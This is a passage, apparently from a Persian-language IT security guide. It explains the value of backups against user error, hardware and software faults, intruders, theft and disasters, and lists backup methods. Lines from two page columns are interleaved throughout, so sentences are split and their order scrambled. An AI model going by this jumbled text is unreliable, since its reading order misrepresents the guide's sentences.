‫ﺩﻻﻳﻞ ﮔﻮﻧﺎﮔﻮﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷـﻮﻧﺪ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﻣﻲﺷﻮﺩ؛‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺍﺟﺰﺍﻱ ﻛﻠﻴﺪﻱ ﻭ ﻣﻬﻤﻲ ﺩﺭ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻣﺤـﺴﻮﺏ‬
‫ﻭ ‪...‬‬ ‫•‬
‫ﺷﻮﻧﺪ‪:‬‬
‫ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ‪ ،‬ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ‬
‫ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮ‬ ‫ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺑﺎﺷﺪ‪ .‬ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﻳﻚ ﻛﭙـﻲ ﺍﺯ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺮﺧﻲ ﻣﻮﺍﻗﻊ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺧـﻮﺩ ﺭﺍ‬ ‫ﻓﺎﻳﻞ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﻧﺘﻘﺎﻝ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ‬
‫ﭘﺎﻙ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺍﺳـﻄﻬﺎﻱ ﮔﺮﺍﻓﻴﻜـﻲ ﻛـﺎﺭﺑﺮ ﺍﻳـﻦ‬ ‫ﻓﻼﭘﻲ ﻭ ﻳﺎ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺍﺯ ﺁﻥ ﻧﮕﻬﺪﺍﺭﻱ ﻣـﻲﺷـﻮﺩ‪ .‬ﭼﻨﺎﻧﭽـﻪ‬
‫ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﻳﺎ ﺷـﺎﺧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﺑـﻪ‬ ‫ﻓﺎﻳﻞ ﺍﺻﻠﻲ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﺩ ﻳﺎ ﭘﺎﻙ ﺷﻮﺩ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ‬
‫ﻣﻜﺎﻧﻲ ﻧﺎﺩﺭﺳﺖ ﻣﻨﺘﻘﻞ ﺷﻮﺩ‪ .‬ﺍﻣﺎ ﭼﻨﺎﻧﭽﻪ ﻣﺮﺗﺒﹰﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﭘﺸﺘﻴﺒﺎﻥ‬ ‫ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ ﻭ ﺁﻧﺮﺍ ﺟﺎﻳﮕﺰﻳﻦ ﻓﺎﻳﻞ ﻗﺒﻠﻲ ﻧﻤﻮﺩ‪.‬‬
‫ﺗﻬﻴﻪ ﺷﺪﻩ ﺑﺎﺷﺪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﻳﺎﺑﻲ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺍﺗﻔﺎﻗﻲ ﭘـﺎﻙ‬
‫ﻗﺎﻧﻮﻥ ﺩﻭﻡ‪:‬‬
‫ﺷﺪﻩﺍﻧﺪ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﺷﺘﺒﺎﻫﺎﺕ‬
‫ﻛﻮﭼﻚ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻫﻜﺎﺭ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ ﺧﻮﺑﻲ ﺑﺎﺷﺪ‪.‬‬ ‫ﻣﺮﺗﺒ ﹰﺎ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ ﻭ ﺍﮔﺮ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ ﻣﻌـﺮﺽ‬
‫ﺗﻬﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻜﺎﺕ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ‪.‬‬
‫ﻧﻘﺺ ﺩﺭ ﺳﺨﺖﺍﻓﺰﺍﺭ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﺳﺎﺩﻩ ﻭ ﻳﺎ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﭼـﺎﺭ‬ ‫ﺑﺎﺷﻨﺪ )ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺩﻳﺴﻚ ﻓﻼﭘـﻲ ﻛـﻪ ﺍﺯ‬
‫ﺧﺮﺍﺑﻲ ﺷﻮﺩ ﻭ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻃﻮﻝ ﻳـﻚ ﻓﺮﺁﻳﻨـﺪ‬ ‫ﺁﻥ ﺩﺭ ﻛﺸﻮﻱ ﻣﻴـﺰ ﻛـﺎﺭ ﺧـﻮﺩ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ(‪ .‬ﺍﻛﺜـﺮ‬
‫ﮔﺮﺩﺩ‪ .‬ﺻﺪﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﺩﻳﺴﻚ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ‬ ‫ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﻓﺎﻳﻠﻲ‬
‫ﻣﻨﺠﺮ ﺑﻪ ﺗﺨﺮﻳﺐ ﻛﺎﻣﻞ ﺩﻳﺴﻚ ﺷـﻮﺩ‪ .‬ﻭﻟـﻲ ﭼﻨﺎﻧﭽـﻪ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ‬ ‫ﺭﺍ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺩﺍﺭﻳﺪ ﺑﻪ ﺭﻭﻱ ﻧﻮﺍﺭﻫـﺎﻱ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻭ ﻳـﺎ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺑﺎﺷـﺪ ﻣـﻲﺗـﻮﺍﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﻣﺠـﺪﺩﹰﺍ ﺭﻭﻱ‬ ‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ‪ ١٩‬ﻛﭙﻲ ﻛﻨﻴﺪ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﺭﺍﻳﺎﻧـﺔ‬
‫ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﻭ ﻳﺎ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﻮﺩ‪.‬‬ ‫ﺷﻤﺎ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ‪ ،‬ﺑﺎ ﺧﺮﻳﺪ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺟﺪﻳﺪ ﺑﺎ ﺳﺎﺧﺘﺎﺭﻱ ﻣـﺸﺎﺑﻪ‬
‫ﺭﺍﻳﺎﻧﺔ ﻗﺪﻳﻤﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ‬
‫ﻧﻘﺺ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬ ‫ﺑﻮﺩ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻪ ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ‪.‬‬
‫ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ ‪ Microsoft Word‬ﻭ ‪Excel‬‬ ‫ﻧﻘﺎﻳﺺ‪ ،‬ﺗﺼﺎﺩﻓﺎﺕ‪ ،‬ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ﻭ ﺣﻤﻼﺕ ﻣﻬـﺎﺟﻤﻴﻦ ﻗﺎﺑـﻞ‬
‫ﻭ ‪ Access‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎﻋﺚ ﺍﺯ ﺑﻴﻦ ﺭﻓـﺘﻦ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﻓﺎﻳﻠﻬـﺎﻱ‬ ‫ﻻ ﻋﻠﻴـﺮﻏﻢ ﺗﻼﺷـﻬﺎﻱ ﺯﻳـﺎﺩ ﺑـﺮﺍﻱ‬
‫ﭘﻴﺶ ﺑﻴﻨـﻲ ﻧﻴـﺴﺘﻨﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﺑﺮﻧﺎﻣﺔ ﻛـﺎﺭﺑﺮﺩﻱ‬ ‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺑﻌﻀﻲ ﺍﺯ ﻣﺸﻜﻼﺕ ﺟﻠﻮﮔﻴﺮﻱ‬
‫ﻞ ﻛﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﭘـﺎﻙ‬ ‫ﺷﻤﺎ ﻧﺎﮔﻬﺎﻥ ﻧﻴﻤﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ﻓﺎﻳ ﹺ‬ ‫ﻧﻤﻮﺩ‪ ،‬ﻭﻟﻲ ﺍﮔﺮ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺳـﺐ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ ﺣـﺪﺍﻗﻞ‬
‫ﻛﻨﺪ‪ ،‬ﺑﺎﺯ ﻫﻢ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪18‬‬ ‫‪Hard Disk‬‬
‫‪19‬‬ ‫‪CD-ROMs‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٥٨‬‬

‫ﺍﻳﻤﻨﻲ ﺩﺭ ﺑﺮﺍﺑﺮ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﺭﻩ ﻭ ﻳـﺎ ﻣﻨـﺰﻝ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ‬ ‫ﻧﻔﻮﺫﻫﺎ ﻭ ﺗﺨﺮﻳﺒﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻫﺴﺘﻴﺪ‪ ،‬ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﺍﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﻬــﺎﺟﻤﻴﻦ ﻭ ﻭﻳﺮﻭﺳــﻬﺎﻱ ﻣﺨــﺮﺏ ﻣﺮﺗﺒ ـﹰﺎ ﺑﺎﻋــﺚ ﺗﻐﻴﻴــﺮ ﻭ ﻳــﺎ‬
‫ﻼ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺷﻴﻮﻩﻫﺎﻱ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺫﻳ ﹰ‬ ‫ﭘﺎﻙﺷﺪﻥ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺩﺭ ﺍﻳـﻦ‬
‫ﻓﺎﻳﻠﻬــﺎﻱ ﺣــﺴﺎﺱ ﺧــﻮﺩ ﺭﺍ ﺭﻭﻱ ﺩﻳــﺴﻚ ﻓﻼﭘــﻲ‪،‬‬ ‫•‬ ‫ﺯﻣﻴﻨﻪ ﻧﻴﺰ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ‪ ،‬ﻭ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ ﻇﺮﻓﻴﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﮕﺎﻧﻲ‬
‫ﺑﺎﻻ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙﻛﺮﺩﻥ ﻧﻴﺰ ﺩﺭ ﺁﻧﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛﭙـﻲ‬
‫ﻛﻨﻴﺪ‪.‬‬ ‫ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻌﻨـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺑﺎﻳﮕـﺎﻧﻲﺷـﺪﻩ ﺗﻠﻘـﻲ‬
‫ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﻘﺎﻳﺴﺔ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺭﺍﻳـﺞ ﺑـﺎ‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﺩﻳﺴﻚ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺩﻳـﺴﻚ ﺍﻧﻌﻜﺎﺳـﻲ‪ ٢٠‬ﻳـﺎ‬ ‫•‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﻳـﻦ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﮔﺮ ﻓﻀﺎﻱ ﻛـﺎﻓﻲ ﻣﻮﺟـﻮﺩ ﺍﺳـﺖ ﺭﻭﻱ ﻳـﻚ ﺷـﺎﺧﻪ ﺩﺭ‬
‫ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻛﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻋﻤﺪﹰﺍ ﻳـﺎ‬
‫ﻫﻤﺎﻥ ﺩﻳﺴﻚ ﻣﺎﺩﺭ ﻛﭙﻲ ﻛﻨﻴﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺧﺮﺍﺑﻴﻬﺎﻱ‬
‫ﺳﻬﻮﹰﺍ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺍﮔـﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺑـﻪ‬
‫ﺍﺳﺎﺳﻲ ﻛﻤﻚ ﭼﻨﺪﺍﻧﻲ ﻧﻤﻲﻛﻨﺪ ﻭ ﺻﺮﻓﹰﺎ ﺍﮔـﺮ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ‬
‫ﻋﻘــﺐ ﺑﺮﮔــﺸﺘﻪ ﻭ ﺗﺎﺭﻳﺨﭽــﺔ ﻳــﻚ ﭘــﺮﻭﮊﻩ ﺭﺍ ﺑﺎﺯﺳــﺎﺯﻱ ﻛﻨﻴــﺪ‬
‫ﻓﺎﻳﻠﻬﺎ ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﭘﺎﻙ ﺷﻮﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻣﻨﺎﺑﻊ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺁﻳﻨﺪ‪.‬‬
‫ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺁﺭﺷﻴﻮ ﻓﺸﺮﺩﻩ ﺳـﺎﺯﻱﺷـﺪﻩﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ‬ ‫•‬
‫ﻣﻬﻢ ﺧـﻮﺩ ﺍﻳﺠـﺎﺩ ﻛﻨﻴـﺪ‪ .‬ﺍﻟﺒﺘـﻪ ﻣـﻲﺗـﻮﺍﻥ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ‬ ‫ﺳﺮﻗﺖ‬
‫ﻣﺮﺑﻮﻃــﻪ ﺭﺍ ﺭﻭﻱ ﻫﻤــﺎﻥ ﺳﻴــﺴﺘﻢ ﺍﻭﻟﻴــﻪ ﻭ ﻳــﺎ ﺭﻭﻱ‬ ‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺁﺳﺎﻧﻲ ﺍﺳﺖ‪ .‬ﺑـﺎ ﺗﻮﺟـﻪ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻭ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﻣﺘﻔـﺎﻭﺕ ﻛﭙـﻲ‬ ‫ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﺗﻬﻴﺔ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻭ ﺫﺧﻴـﺮﺓ ﺁﻧﻬـﺎ ﺩﺭ‬
‫ﻧﻤﻮﺩ‪.‬‬ ‫ﻣﺤﻠﻲ ﺧﺎﺭﺝ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺭ ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﻛﻤـﻚ ﺷـﺎﻳﺎﻧﻲ ﺧﻮﺍﻫـﺪ‬
‫ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ‬ ‫•‬ ‫ﺑﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴـﺰ ﺑـﻪ‬
‫ﻳﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺁﻧﺮﺍ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ‪.‬‬ ‫ﻫﻤﺮﺍﻩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﺮﺍﺑﻲ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ‬ ‫•‬


‫ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ‬
‫ﺍﺯ ﺍﻳﻤﻨﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﻴﺪ ﺩﺭ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺍﺯ ﺩﻭ‬
‫ﺩﻳﺴﻚ ﺳﺨﺖ ﻭ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﺯ ﻫـﺮ‬ ‫ﻭﻗﻮﻉ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻧﻈﻴﺮ ﺳﻴﻞ‪ ،‬ﺯﻟﺰﻟﻪ ﻭ ﺁﺗﺶﺳﻮﺯﻱ ﺍﻫﻤﻴﺖ ﺣﻔﺎﻇـﺖ‬
‫ﻓﺎﻳﻞ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻣﻲ ﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﻟﺒﺘـﻪ‬ ‫ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻴﺸﺘﺮ ﺭﻭﺷﻦ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺭﻋﺎﻳﺖ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﺯﻫﻢ‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺤﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺗﻬﻴﺔ ﻣﺪﺍﻭﻡ ﭘﺸﺘﻴﺒﺎﻥ ﺟﻬﺖ ﺣﻔﺎﻇﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣـﺸﻜﻼﺕ‬
‫ﺑﻼﻳﺎﻱ ﺩﻳﮕﺮ‬
‫ﺩﻳﮕﺮ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻧﺸﺖ ﻟﻮﻟﻪﻫﺎﻱ ﮔﺎﺯ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺁﺗﺶﺳﻮﺯﻱ ﻧﺎﺷﻲ ﺍﺯ‬
‫ﺍﺯ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﻳﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩ؟‬ ‫ﺁﻥ ﻳﺎ ﺭﻳﺨﺘﻪﺷﺪﻥ ﻣﻮﺍﺩ ﻣﺎﻳﻊ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺗﻬﻮﻳـﻪ ﺑﺎﻋـﺚ ﺑـﺮﻭﺯ‬
‫ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬ ‫ﻣﺸﻜﻞ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺰ ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬
‫ﺍﺯ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺧﺘﺼﺎﺻﻲ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺳﺖ ‪ -‬ﺍﻟﺒﺘﻪ‬ ‫‪.۱‬‬
‫ﻏﻴﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ‪ -‬ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺍﻳـﻦ‬ ‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧﻘﺶ ﻣﺆﺛﺮﻱ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‬
‫ﺍﻣﺮ ﺩﺭ ﻗﺪﻡ ﺍﻭﻝ ﺷﺎﻣﻞ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﻣـﻲﺷـﻮﺩ ﻭﻟـﻲ‬ ‫ﻭﺟﻮﺩ ﺍﹶﺷﻜﺎﻝ ﮔﻮﻧﺎﮔﻮﻥ ﺁﻧﻬﺎ ﭼﻨﺪﺍﻥ ﻋﺠﻴﺐ ﻧﻴﺴﺖ‪ .‬ﻧﻜﺘـﺔ ﻗﺎﺑـﻞ‬
‫ﺩﻗــﺖ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺑﺎﻳــﺪ ﺍﺯ ﺗﻤــﺎﻡ ﻓﺎﻳﻠﻬــﺎﻳﻲ ﻛــﻪ‬ ‫ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻜﺎﺭﺭﻓﺘـﻪ ﺩﺭ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺷـﺮﺍﻳﻂ‬
‫ﻓﻮﻕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮ ﻛﺎﺭﺑﺮﺩﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﻪ‬
